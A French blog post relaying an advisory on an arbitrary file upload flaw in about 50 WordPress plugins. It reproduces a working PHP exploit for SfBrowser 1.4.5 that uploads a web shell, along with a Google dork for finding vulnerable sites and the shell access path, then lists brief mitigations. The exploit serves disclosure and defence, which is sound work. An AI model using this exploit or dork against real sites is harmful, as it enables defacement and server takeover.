Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

Alerte – 50 plugins WordPress troués !

Je viens de recevoir par email un adviso de la société Seraum spécialisée en sécurité informatique, qui a mis au jour une faille critique permettant l’upload de fichiers dans plus de 50 plugins WordPress. Du coup, c’est important que vous soyez au courant que si vous utilisez un de ces plugins, vous pouvez vous faire défacer en 2 secondes par un script kiddy qui n’aurait pas école aujourd’hui.

  • Homepage slideshow
  • 3D banner rotator
  • – Nmedia User File Uploader
  • – Front end upload
  • – Poverplay gallery
  • – WordPress Accordion Gallery
  • – Wp superb slideshow
  • – Wp-Property
  • – Video Gallery 1.3
  • – HTML5 Av Manager
  • – Royal Gallery
  • – 3D Flick Slideshow
  • – Image News Slider
  • – RBX Gallery
  • – wp-gpx-map
  • – File groups
  • – User Meta
  • – SfBrowser
  • – WPStoreCart
  • – Hungred Post Thumbnail
  • – MM Forms Community
  • – Tinymce Remind
  • – Gallery
  • – Thinkun Remind
  • – Foxypress
  • – PDW File Browser
  • – VideoWhisper
  • – WordPress Font Uploader
  • – FCChat Widget
  • – Comment Extra Fields
  • – Nmedia WordPress Member Conversation
  • – PictureSurf Gallery
  • – Really simple Gallery (probably vuln)
  • – PICA Photo Gallery
  • – Asset Manager
  • – Vertical slideshow
  • – Carousel slideshow
  • – Front file manager
  • – Omni secure files
  • – Mac photo gallery
  • – Smart slideshow
  • – Bliss Galery
  • – YASS
  • – Catpro Gallery
  • – Matrix Gallery
  • – Gallery Explorer
  • – Dreamwork Gallery
  • – Blaze slideshow
  • – Slideshow pro

Voici l’exploit en question appliqué à l’un de ces plugins :

###########################################################
#
# Exploit Title: WordPress SfBrowser Version 1.4.5 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/sfbrowser/connectors/php/
# Date: 11/06/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage: http://www.sjeiti.com/
# Software Link: http://downloads.wordpress.org/plugin/sfbrowser.zip
# Version: 1.4.5
#
###########################################################

Vuln page : http://mysite.com/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php

exploit :

<?php
$u= »C:Program Files (x86)EasyPHP-5.3.9wwwshell.ptxt »;
$c = curl_init(« http://127.0.0.1/wp/wp-content/plugins/sfbrowser/connectors/php/sfbrowser.php »);
curl_setopt($c, CURLOPT_POST, true);
curl_setopt($c, CURLOPT_POSTFIELDS,
array(‘fileToUpload’=> »@$u »,
‘a’=> »upload »,
‘file’=> » »,
‘deny’=> »lam »,
‘allow’=> »ptxt|exe|sh »,
‘resize’=>array(0,0)));
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$e = curl_exec($c);
curl_close($c);
echo $e;
?>

shell Access : http://mysite.com/wp-content/plugins/sfbrowser/shell.ptxt

Pour se protéger, plusieurs possibilités à part virer le plugin vulnérable:

  • Placer un fichier .htaccess dans les dossiers de plugin
  • Placer des index.php vides dans les dossiers qui n’en ont pas
  • Inclure un appel aux variables ABSPATH ou session admin au début de chaque script php

Quand les dev font de la merde, les admins trinquent 😉

Bonne sécurisation à tous !

Merci à Adrien Thierry, l’auteur de cet exploit de m’avoir informé.

Il y a aussi ce site, learn to secure your WordPress Installation


Microsoft Surface Book 2, 13,5″ Argent

Core i5, 8Go de RAM, 256Go, Windows 10 Pro – 22% de réduction

Profitez de 4 fois plus de puissance et de jusqu’à 17 heures1 d’autonomie. Des performances graphiques exceptionnelles désormais disponibles en deux tailles d’écran PixelSense
Le nouveau Surface Book 2 regroupe un ordinateur portable polyvalent, une tablette et un studio portable tout-en-un.

Léger et puissant, Surface Surface Book 2 offre un design innovant avec sa charnière si particulière qui confère à la machine un aspect robuste mais sans sacrifier la mobilité de l’appareil.

En Savoir +



6 outils pour cloner un disque dur sous Windows et Linux

Cloner c’est facile… Bon, ok, cloner un bébé, c’est déjà plus complexe mais un disque dur, c’est l’enfance de l’art… Alors bien sûr le logiciel le plus connu pour ça, est Ghost de Symantec mais au prix de 999,99 euros HT (j’déconne, je ne connais pas le prix en vrai), c’est déjà plus rentable de se mettre à cloner son petit frère artisanalement dans le garage …

Lire la suite



Générer du bruit de fond pour polluer les datas récoltées par les boites noires

Si vous voulez surcharger les boites noires utilisées par votre pays afin de tout savoir sur vous et ainsi mieux vous contrôler, voici Noisy.

Ce script python n’a d’autre but que je générer de fausses données sur le réseau afin de pourrir les éventuelles données récoltées sur vous.

Ce bruit de fond est constitué de requêtes DNS / HTTP(S) aléatoires et peut tourner aussi dans un Docker…

Lire la suite



Que faire quand on n’arrive pas à tomber sur le portail captif d’une borne wifi publique ?

Quand on se connecte à un réseau public wifi, il arrive parfois qu’on ait du mal à obtenir le fameux « portail captif »‘ où on nous demande en général notre adresse email, avant de nous laisser librement surfer. En effet, sur certaines bornes wifi, le truc est tellement mal configuré que si vous entrez l’URL de votre moteur de recherche préférée ou de Facebook et bien vous n’obtiendrez rien…

Lire la suite



Comment accélérer l’indexation de la recherche Windows ?

Pour proposer une recherche locale rapide, Windows utilise ce qui s’appelle un « indexeur« . Il s’agit d’un process qui tourne en tâche de fond sur votre ordinateur et qui réalise un index de l’ensemble des fichiers et dossiers présents sur votre disque dur. Pour ne pas consommer trop de ressources, ce service se déclenche uniquement lorsque votre machine n’est pas trop utilisée et à intervalle régulier…

Lire la suite